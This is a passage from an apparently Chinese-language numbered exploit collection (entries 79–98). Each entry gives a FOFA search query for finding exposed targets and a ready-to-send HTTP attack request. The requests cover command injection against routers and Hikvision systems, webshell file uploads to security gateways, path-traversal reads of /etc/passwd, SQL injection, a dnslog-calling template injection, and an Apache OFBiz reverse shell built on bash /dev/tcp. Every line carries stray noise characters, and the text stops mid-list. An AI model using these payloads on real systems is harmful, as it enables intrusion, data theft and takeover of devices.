8 k( q$ Y- U$ X( kContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"7 U4 E0 L2 D8 v& O
Content-Type: image/png
- r+ |6 q6 h/ V Q
4 J1 t% h- d7 i6 |. x) V' }- zYsOxWxSvj1KyZow1PTsh98fdu6l7 f' } }4 b* V" r
------YsOxWxSvj1KyZow1PTsh98fdu6l; E, D# ?/ l" w. H3 r1 E$ h
Content-Disposition: form-data; name="target"* q/ G0 Q7 g# W& m+ k1 y
4 i2 |" }5 r) G
/Applications/SkillDevelopAndEHS/
, g' l) d9 i8 d) d9 ?/ U6 n------YsOxWxSvj1KyZow1PTsh98fdu6l--, z6 P/ U5 n: U. B% z* Q; @
/ ]) p. ]# i0 b1 L9 Q% w3 o7 v8 K- u! d/ o" t
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.10 I" y N5 z e8 K! K
Host: x.x.x.x% N6 @& r2 t* Y8 v
2 u$ }& x+ m9 J: t: Z
2 E8 h, r! j }8 N! ~$ ]2 E
79. BYTEVALUE 百为流控路由器远程命令执行
U0 ^/ Z+ w! B" ^. T3 |8 GFOFA:BYTEVALUE 智能流控路由器
- p! h$ f* t$ x6 l8 B0 R! v* LGET /goform/webRead/open/?path=|id HTTP/1.1: D, i' ]- \. Z* A$ e
Host:IP
7 h5 G' f F" }0 G# n1 u$ V* m4 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0! q( z7 O [ c0 l1 g! {- T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* Y; Z3 n! }5 ? B+ Y' D3 Y" N, r5 ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ M+ ]! |6 _9 B* L! b2 SAccept-Encoding: gzip, deflate' \* ^2 H7 F/ q3 S2 N; k- |
Connection: close
' J2 d- w. k/ c' D s; Y# @* lUpgrade-Insecure-Requests: 1
9 e8 v% q! e" ^# T
6 Y3 I( o% `: o) j' |( m
6 S1 \& p+ B w" M! y3 `80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传8 v) X, |. P& y$ O
FOFA:app="速达软件-公司产品"
/ Z, l' { Z- |+ T; [* S1 v* MPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1; r( u3 {; E7 |0 w& U
Host: x.x.x.x
( {4 T+ G' ?2 y! E" M cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# {: O0 ~: |: ~4 n+ B
Content-Length: 27
. \; x7 f' D" m6 o5 c- X8 i) b( g' KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 D! Z$ A% B/ L" }# _Accept-Encoding: gzip, deflate: F0 c; X `; s! t" c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) T3 X+ B2 f4 |& E4 ?' h
Connection: close, f& z3 f9 m8 O ]# Y, Q! b; h
Content-Type: application/octet-stream
) w# }$ P4 m: H% Q* u+ e) C6 hUpgrade-Insecure-Requests: 1 y! m6 s" ~ `: z$ F
+ W2 ?$ c2 ~9 M, O
<% out.print("oessqeonylzaf");%>$ E2 D5 G0 x6 M& s9 d
6 H. |6 i7 } n, R, }- o# |
6 V' ?* E# }" \1 E" W* KGET /xykqmfxpoas.jsp HTTP/1.15 g1 t$ v9 L5 p/ R
Host: x.x.x.x
! I% c. G) i7 ~7 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ [9 b9 ^5 ~8 b1 X5 M! B( MConnection: close
( P0 @: H5 \: }: E% Z5 LAccept-Encoding: gzip
+ x; m9 N1 R" ]! a5 N( a
; T% ^- M2 a& {; ]: G8 d+ [ a5 c$ c. P- O# V& S+ c
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
! v: X0 R0 U% C% K [: o5 [8 SFOFA:app="uniview-视频监控"7 V8 N1 K4 p3 ^% K9 y1 ~ m
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
- W) E; ^9 h2 X2 k9 D, e2 D9 G, L' @Host: x.x.x.x
* {( i; q" F9 C5 q W9 b) g; tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! j! p! `# h1 a2 j) p
Connection: close
, D) Q' w* |% q- UAccept-Encoding: gzip. P2 o7 T8 K8 u5 b# T7 Q" s2 l
; T. h' F6 M/ C6 ?
, O5 [/ A* o5 i- g
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行+ k! F' h" A. W- g& e3 T7 q4 V
FOFA:app="思福迪-LOGBASE"$ C! ?* q. j" p* P$ c* @+ J
POST /bhost/test_qrcode_b HTTP/1.1
% ~: K8 v% y( p7 [! i4 sHost: BaseURL4 e) |3 R8 l' `5 e2 i1 o% b' R5 F
User-Agent: Go-http-client/1.1; s4 \8 X7 O: u! E( o3 S/ @/ p
Content-Length: 230 k, O/ h$ @3 Y9 k" B
Accept-Encoding: gzip- v" k2 X6 V1 m8 R2 `
Connection: close' a! t: {6 o: i. S2 m2 n
Content-Type: application/x-www-form-urlencoded% }7 e+ c& C3 Z2 {% P9 p2 S: X' C
Referer: BaseURL$ I/ |: ?7 M! e8 H2 j1 D
. r- V/ f. T# q2 R/ o" ?3 |0 `: uz1=1&z2="|id;"&z3=bhost& Y5 }) v/ w$ f& ?/ Q
# r: R9 [3 K( m
' `; y% T1 j. h7 |$ |9 U% ]/ \+ B83. JeecgBoot testConnection 远程命令执行8 S& R7 D) ?. V
FOFA:title=="JeecgBoot 企业级低代码平台"% Z: x5 \1 g4 ]( ^1 O
. w% q. ~! X2 B7 u# r0 }
+ c6 E) o7 G1 o% U3 I+ t5 QPOST /jmreport/testConnection HTTP/1.1
2 X' _0 I9 f' E) s. ZHost: x.x.x.x2 G9 U9 Y/ b* }6 h! [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# _0 D3 ?' J! K& q. K
Connection: close6 G* k: ^5 \3 o/ x9 {- |7 ]' T
Content-Length: 8881
6 K+ `( Q5 K1 s1 q! oAccept-Encoding: gzip3 ]; @) v5 [3 p/ @3 U
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
. q1 j. E. ~) w. I/ YContent-Type: application/json! o* F0 N9 O1 _
$ E8 X# o: p Q3 R! U( g
PAYLOAD! w' ?5 D) M$ ]/ u+ `$ X+ K3 ~# ^4 h( `, z
# { ^9 J7 Y; a5 |' U; e2 H: f2 Y
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
4 R. P3 {) ]7 f7 S/ `% @FOFA:title=="JeecgBoot 企业级低代码平台"4 I8 m. W) A8 ?3 w
, @& W) S" ]# y
3 s* A. \. i, C7 b& d
n* l1 I; }( ]0 P. U8 sPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
5 E7 T9 _) w* @' j- f( j: h, R& a' CHost: 192.168.40.130:8080
# J% Q7 q2 e: ~User-Agent: curl/7.88.1$ Z+ u4 n2 `: A! k3 y. ]. [1 E
Content-Length: 156' L9 _8 N8 d; a
Accept: */*
( l# l2 u! D. A B5 t5 cConnection: close
. ?( H8 n6 V8 Z6 f: [' lContent-Type: application/json# y8 Z% O% I; P6 a( ^
Accept-Encoding: gzip: g$ I) E2 P7 B6 [; A4 q* H' G
2 j. L1 C9 a& y; y. O
{
% T( l9 f$ h- {1 C "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",* d& T% |* W6 d& H2 ?7 |/ @
"type": "0"5 G; N7 J' ]2 `( \9 N
}
2 \ U: g% }+ C+ e2 N, ]* p- k- Z) c, O5 N! w
3 Q t3 m5 s4 H8 D" x85. SysAid On-premise< 23.3.36远程代码执行( ]% ?! o, l# W3 M
CVE-2023-47246/ Z7 p1 w7 t6 X% |& G; c
FOFA:body="sysaid-logo-dark-green.png"
' Y; \8 U6 r( ?EXP数据包如下,注入哥斯拉马
% g* R% E Q$ k4 ~% w$ q5 rPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
2 l; C( Q7 S& _* ?Host: x.x.x.x: L( Q7 P1 O4 o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, A8 N r1 y" O5 b9 Z! R; Y1 I% o
Content-Type: application/octet-stream0 g( u; j2 j" H. G8 C5 f' `" c" r
Accept-Encoding: gzip: ~' a9 t; Q) U8 h" G1 {6 V; G
$ }' l- l) o4 C3 lPAYLOAD
- t' p0 I3 W% J( A
4 P; N6 G7 w, i" t) H回显URL:http://x.x.x.x/userfiles/index.jsp9 ]" U9 p. X0 }9 y9 l9 f
# y* c" v/ \+ Z! V
86. 日本tosei自助洗衣机RCE- v0 K: d* m* P2 o
FOFA:body="tosei_login_check.php"
, V P" A+ j$ [ TPOST /cgi-bin/network_test.php HTTP/1.1+ ^5 R# r) Z7 ~1 b( P. e
Host: x.x.x.x8 s7 C6 W! M: \$ p* U( X/ t" J5 ~0 p
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36# f4 b5 ], _$ z7 m% g7 m& C: ]
Connection: close& Z% j: N: k6 Y2 R' O) g
Content-Length: 44/ {& |$ f+ b7 ]% v" u3 q
Accept: */*
0 `$ q% \$ `. a* L Z% aAccept-Encoding: gzip
( s d- c. A8 HAccept-Language: en: Z, m9 I v; s9 n+ A
Content-Type: application/x-www-form-urlencoded: i- ]: `. l& a9 Q: g
0 ] U: }. M1 }/ w% khost=%0acat${IFS}/etc/passwd%0a&command=ping* }7 u9 W: N6 l; M( F. H
" A* a3 d' K8 s# \
4 `- J6 L1 a6 P8 U, b& J+ Y87. 安恒明御安全网关aaa_local_web_preview文件上传' B% O9 Q/ L3 p8 T, m; @1 v2 F
FOFA:title="明御安全网关"
" D( e8 ~& j/ UPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.12 F6 W3 Z9 O5 M, G. F. ]2 T' G
Host: X.X.X.X
4 w" C3 A$ L7 x( A' A8 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! X/ X+ T% G% _
Connection: close
! d S* p$ ^ V2 Z( JContent-Length: 198
! ?& U5 [( X: R0 @! PAccept-Encoding: gzip5 Z( {. k; y4 V/ y! F
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd ]( K: x& k' J
" t1 k$ y* L6 n4 U) N
--qqobiandqgawlxodfiisporjwravxtvd
E! e/ d2 A. @+ {Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
/ b6 Q. j2 d/ p3 T3 ^Content-Type: text/plain% y7 Y( P; T5 v$ I, A" `9 v
$ O" Z4 j8 d' ]4 ~, A
2ZqGNnsjzzU2GBBPyd8AIA7QlDq# B$ C/ M3 C4 P- ]: @; c
--qqobiandqgawlxodfiisporjwravxtvd--6 H J& R- t9 ?- ]! Q1 [) L: V1 R
K$ i# I4 p) x5 E0 T
$ V1 A3 _8 D U/jfhatuwe.php
8 W, }4 u7 E! G' o0 W( L; C. ]% s& W X f
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行9 p2 G, L1 x% c, _, y
FOFA:title="明御安全网关"5 d5 ~7 _4 E) z# a; l4 t
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
2 o& f! S2 M# H3 DHost: x.x.x.xx.x.x.x3 |! b% l: I4 B7 I# c9 Q$ k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% p" e4 `! l Y2 {: A/ x8 ^1 u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 m- `/ [8 z D3 gAccept-Encoding: gzip, deflate
! V2 P; s% Z0 {1 }5 RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* Z) d8 S7 N$ |5 DConnection: close
' `8 L7 x; ~! ~6 d/ K* Z0 B$ N9 [) W7 B( U$ H p
! V/ T+ T* H X1 N% b" `/astdfkhl.php
W! Y% p5 N+ T a& m# m5 l" K
+ S q- h7 P. R1 l89. 致远互联FE协作办公平台editflow_manager存在sql注入
" l3 S. n; S) s) FFOFA:title="FE协作办公平台" || body="li_plugins_download"8 e9 N; b! ^, [* P. {+ N5 d/ v
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
0 e8 W* m2 W; }, YHost: x.x.x.x
8 y8 L9 }6 r# IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 I j) a J* m$ w9 m2 mConnection: close" y/ M4 @; ]: Y1 U, e
Content-Length: 41
1 E4 I7 M( Q# T5 f% tContent-Type: application/x-www-form-urlencoded3 Z# M! k1 d- m# Z
Accept-Encoding: gzip) N, j& s0 m+ A' Z H
: } p# A8 g( a5 g1 Aoption=2&GUID=-1'+union+select+111*222--+
- T) m/ D& Y$ j( V# b' ~0 _
) d% M! |+ q1 c1 s5 Q5 R+ B. {! y6 o0 t+ b2 d; T2 j
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行- E1 g% d8 ?6 |" J. C" W
FOFA:icon_hash="-1830859634"( l8 [8 k4 M4 |: \
POST /php/ping.php HTTP/1.17 O" Z! S0 e' C( n$ k$ N1 y
Host: x.x.x.x( V9 e5 {) o- i6 P0 C/ ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0* f3 {: E" C: k$ ^; f
Content-Length: 51
8 c/ @+ s" e5 d5 E6 A2 t, oAccept: application/json, text/javascript, */*; q=0.01
' N" v8 F' o1 G- }Accept-Encoding: gzip, deflate# W, Q' p+ }, ` p7 z$ n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 l- [. m* W0 j) g, u+ o
Connection: close4 K# }: X$ P" ` _, O( S
Content-Type: application/x-www-form-urlencoded: b8 i. _" @2 M0 |0 {* z$ {
X-Requested-With: XMLHttpRequest
8 z* r. U" q1 {; M- O5 e2 D' `0 r
& ?0 o1 y! ^8 S' pjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
/ Q# e& D0 @, h# |+ c; s- U: Z8 a$ d; x
' e5 S: C& K6 @2 q7 [6 }0 b+ }! ]91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取* m j/ w4 \7 } Q
FOFA:title="综合安防管理平台"/ c8 ]( p. c' l+ S7 u" R
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1& J, d4 d1 Y7 Z
Host: your-ip
# z7 z; S% G* u6 ^1 ~! M% jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, a3 l( c& [7 N ^% H: z! X
Accept-Encoding: gzip, deflate; j8 v/ K3 X( B! d$ y5 M7 [' S# K
Accept: */*
; z1 Q) `9 V* Q6 `/ V1 MConnection: keep-alive1 z) c& P O- u( l% n' Q
8 p% x1 g: [ K: j' z% z" L6 p' Y* P
$ }. x6 B- {6 x. T
3 n, O6 v, Z& y9 }8 Z) y92. 海康威视运行管理中心session命令执行. X& f2 p- K7 A; s+ l
Fastjson命令执行
2 |3 ?" X1 T1 v( G* v, S* d/ B% Ghunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"$ R3 |- I! j% d0 K: ]
POST /center/api/session HTTP/1.1
7 ^- W/ N$ P) B* E+ l. Q) xHost:
( Y0 Z/ t% G% M5 O3 H# n+ jAccept: application/json, text/plain, */*
K& e7 U: _- D9 _9 m& K( f" mAccept-Encoding: gzip, deflate
, r' |# C$ G' t3 d' tX-Requested-With: XMLHttpRequest
& i5 `% |$ D- V v4 \6 Z, CContent-Type: application/json;charset=UTF-8
, Z, l: Y6 z6 aX-Language-Type: zh_CN
. g; @: D& D. d7 @7 m" X- ZTestcmd: echo test& M1 W# D; [) e; M4 i4 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
4 |3 n) w9 i- b5 B+ @2 zAccept-Language: zh-CN,zh;q=0.9, v' m0 Y1 r& |; N3 |/ j/ Y
Content-Length: 5778& N W( @: Q; q u8 @# h* B6 {
7 U+ `: z, {9 x! G4 Q' L( qPAYLOAD
, D4 @/ F: k7 y5 Q v! Y7 C9 M3 _- W( `! R$ l
" j6 a0 y( C1 T# b& q1 C93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
( ^# y. P! _% A0 b6 a& SFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
6 Q9 i% C# ^5 P5 W: M5 j2 YPOST /?g=app_av_import_save HTTP/1.1
) }: V4 U0 h8 R, h1 H$ ^/ ~0 e* aHost: x.x.x.x
& M8 \5 J& r/ _; C8 X E- qContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
, a- u# c0 N W) L PUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 n" h5 c; F4 q7 X8 b& j& o8 H2 g* s5 T8 ^: \; B0 y6 j
------WebKitFormBoundarykcbkgdfx1 f4 ?3 D' F2 D/ {+ H8 L( s7 P
Content-Disposition: form-data; name="MAX_FILE_SIZE"
6 L. P% w- J# E- l$ x: A/ I( f) T% Z! t ~8 I/ C
10000000; G' x3 ^) z3 a
------WebKitFormBoundarykcbkgdfx
5 v, \3 \9 G. Z) u* mContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"3 H- K9 g5 ^+ L: W5 Z0 g X
Content-Type: text/plain3 s1 X' P* _4 d" t& S, z% i
3 d4 }/ o6 ^: h3 f$ l. zwagletqrkwrddkthtulxsqrphulnknxa6 t) F9 G, I. B1 A
------WebKitFormBoundarykcbkgdfx# G! v1 _ Z: L8 L8 |
Content-Disposition: form-data; name="submit_post"
8 O/ V- Z+ \. I% [
" n ^) p9 l$ q F: h3 Uobj_app_upfile
& H; ?9 U. }# [) O7 w/ g( G------WebKitFormBoundarykcbkgdfx u9 g, @: h2 r' o% L
Content-Disposition: form-data; name="__hash__"; S" n6 d/ p( f' ]) v# y2 f
" d/ R3 u3 h9 l) ]' V' X" r4 v3 T
0b9d6b1ab7479ab69d9f71b05e0e9445
0 H9 X( q: L* Z& d/ R' M2 H$ J------WebKitFormBoundarykcbkgdfx--
, r" s' U2 e" n7 ]/ I' X4 A# R8 \5 G; ]' M
) Y. U+ s- x" ~. FGET /attachements/xlskxknxa.txt HTTP/1.1
/ T4 ?0 l# N* R4 ~" gHost: xx.xx.xx.xx3 S% U4 M3 V# Y0 T4 ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- [% e$ B# H) \( K9 a
8 J, J2 e- C( m! z+ k2 Y
E& t) W( w8 [0 J94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
9 L; ]- z' |' {2 D* I, bFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="' b T+ }+ |+ V | F" z
POST /?g=obj_area_import_save HTTP/1.10 ]( m4 |% i1 u& U6 L' I
Host: x.x.x.x
! d1 s- S8 V+ p5 ]7 v; IContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt4 x' o- ~% l% O: E9 x, r) g8 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
6 f5 a1 {9 S z1 |7 x
( l8 u3 }: T; T8 V------WebKitFormBoundarybqvzqvmt! J5 Z; u0 l5 s2 H
Content-Disposition: form-data; name="MAX_FILE_SIZE"
4 k- y' I! Y; v' `2 ^9 Y& c% k7 t1 n# [% K; F& w, i
10000000) X& d/ l* e5 A0 x6 Z6 I2 e; d
------WebKitFormBoundarybqvzqvmt: {' v( ?8 S8 [, W0 |
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"2 ^8 {0 _! e2 j, E q
Content-Type: text/plain+ R9 I1 t! K8 K- \5 N
2 `1 a1 K" M4 w3 d' Qpxplitttsrjnyoafavcajwkvhxindhmu
& j- `# {4 ?. h: Z, c* q1 Q v------WebKitFormBoundarybqvzqvmt
. Z5 Y, [3 i) r2 h3 d/ U3 y# X9 rContent-Disposition: form-data; name="submit_post") j' Q1 E# |! I* i N' y5 f
" L& [+ U$ S6 v
obj_app_upfile
2 P) q- b' d }1 R------WebKitFormBoundarybqvzqvmt* A! F1 I( u6 |" F4 f
Content-Disposition: form-data; name="__hash__"& Y$ q9 O' n Q" @" \- }
; {" b3 q% [2 Q( B. E
0b9d6b1ab7479ab69d9f71b05e0e9445) }5 Q4 o4 S! q9 b2 f6 C
------WebKitFormBoundarybqvzqvmt--8 Q. u6 |8 G$ F/ o: X1 f3 O8 N1 K
|* O& J* B u3 l6 V* d$ C5 w( V4 j( E& g' i# P( L
1 V5 [& w7 U; x: W7 h
GET /attachements/xlskxknxa.txt HTTP/1.1; E1 F: b- ]8 R1 p- _6 b
Host: xx.xx.xx.xx
8 f. F7 b$ X9 V/ R$ v1 H7 {& L# M5 n: MUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 V7 L A! G( v2 c' Y3 w0 Y
4 W1 A% z3 H5 i: S1 u- H4 l. `
7 Y! `% [6 R! o; I; S% A# `" t/ Q. \" V' r# p7 v8 a
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行# O7 \4 p+ A0 F2 E% ]
CVE-2023-49070
# r" A9 P) w, `FOFA:app="Apache_OFBiz"& a- J% d$ }$ v: m
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
6 W6 W% v' B! s" r0 H9 hHost: x.x.x.x
8 P9 j& v% u3 W' ]0 cUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36- k, C% O8 j3 ]; j: n
Connection: close, N5 a# _. ~8 N9 H* G& s, M4 V
Content-Length: 889, F) S# [: Y9 b q/ i
Content-Type: application/xml
) ?; r# W V5 ^# F' i8 DAccept-Encoding: gzip+ c( t3 Z( e) C6 @5 G% b
j7 J* v( {& l# l& E<?xml version="1.0"?>
, U- T8 B- h6 C; I1 c* d<methodCall>
]$ s: ^: A& i6 v <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
! ^# q9 g/ u/ i2 ^) R9 m/ H <params>: z& z+ f. c/ s. A" j
<param>
9 `% D3 z: b l* u0 ^1 z9 A6 o <value>* E" `# W& a; n4 X$ q! |1 S
<struct>
: |! o) g5 T7 e1 w( A; K8 \3 k' F <member>: }4 f7 v7 ^, M) S. j; {, _
<name>test</name>$ p3 r, p6 A. v1 j0 Z& c8 e5 m
<value>& M2 s8 y+ K# i* a
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>3 u+ g( @5 `: H1 }, i7 \# K
</value>% I* W3 ], O# _) H; b: _
</member>
) u9 I% \$ [: [8 l4 D2 G </struct>( u( u5 i! V9 P* m% K$ `$ |
</value>; c# R& a" ], I5 _* u- E
</param>4 P/ `. W0 J3 r( `
</params>* n% i" b- ~3 w) ~" _( m+ Z* s
</methodCall>
* O! {" @( h2 v# o+ c) L" J" K A P1 @* ^4 _3 p q
: n& T1 B8 U8 _! m% k% B* h
用ysoserial生成payload
$ G3 o m; s$ j$ T. f3 }1 njava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
2 v; Z W- h" }( K
$ T; i% r9 f( k
" m7 H( l0 k ~1 G; S; V( ?将生成的payload替换到上面的POC Q. F5 o# b6 N. k
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
2 _. i9 d, ^9 f3 G9 p9 V) qHost: 192.168.40.130:84437 n, D7 G Z3 b; r
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.365 |- x( k% T. A9 b: a' f, v! x
Connection: close4 r2 V' I$ U9 i4 L5 X0 P
Content-Length: 889
; S# P, v4 N$ X( h6 c2 gContent-Type: application/xml
9 n; w5 W% Z/ ]4 u( Z* }; u+ t7 [Accept-Encoding: gzip
, D8 ]) g+ l4 H6 ~* ~% t% E# Y& j5 V, c+ s0 z' a5 e
PAYLOAD" x# K/ Z) ]/ d; h+ m/ z) \
. b0 a! b5 `4 E e, D; @; a96. Apache OFBiz 18.12.11 groovy 远程代码执行
J( o" d* V3 w( i# D" ]FOFA:app="Apache_OFBiz". U Z, t6 R) F8 l& m, z
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1# ?7 v B2 b( v
Host: localhost:8443
$ K: h# @/ [7 l ~: z- h/ B! ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
: d5 M W( z: l% B. x: S; PAccept: */*5 Q1 V+ P, e( \) |6 ~; B; N3 q: }. a4 H& S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ Z1 s b# \4 {) y( g
Content-Type: application/x-www-form-urlencoded9 \1 p6 s: f" q, v0 O
Content-Length: 55
3 Z2 H, n( c" F4 o
' M1 d. l; c4 i" A4 X: cgroovyProgram=throw+new+Exception('id'.execute().text);$ B% U9 v- j A: y7 v2 f
( B1 ] Z, \* S/ C
- t5 q \* W8 e" j9 a3 ]反弹shell
3 x L/ |! u* u! j' g6 e在kali上启动一个监听/ T& E! u& H B5 n n
nc -lvp 7777
- H# x4 e$ k: }& C% |
/ _8 F5 Y7 C6 Z* `3 uPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.17 W& M" \3 B, `9 O
Host: 192.168.40.130:8443
! h7 C, `8 Q3 |) w, P1 o# C- vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.08 y# V2 W* J7 q3 h: n' h, W, V% k
Accept: */*5 t4 \. h- g! C, a2 g! C) m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( y- P2 ^6 n4 z6 g) JContent-Type: application/x-www-form-urlencoded& a" x* V5 m( \0 N
Content-Length: 71
( P7 o' _8 E) }! t
" c; |7 H* v7 J! l; y4 ogroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
6 K/ K& N' w2 {$ p8 R9 s, B( b# Q) y: @4 s, b/ y0 Y' h1 n( h
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
+ Q; |/ [% s. ^ i# ZFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
9 Q2 a( Z X. D1 ]* H1 WGET /passport/login/ HTTP/1.1. F- z, Y3 s7 S; B m, D: N/ I/ _
Host: 192.168.40.130:80857 @1 b- Z* G. C1 w2 h5 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ P& H/ F& S% @7 T; J' k+ mAccept-Encoding: gzip
: d t1 s8 ^4 `2 f9 }Connection: close3 u+ N3 j5 b6 r" J; x0 l
Cookie: rememberMe=PAYLOAD
$ L8 R, |+ E3 F" I/ _4 OX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk", U2 G3 c: e6 g1 E
! ]' r# I3 v& Q. T
! s7 ?+ n K. H% ^98. SpiderFlow爬虫平台远程命令执行
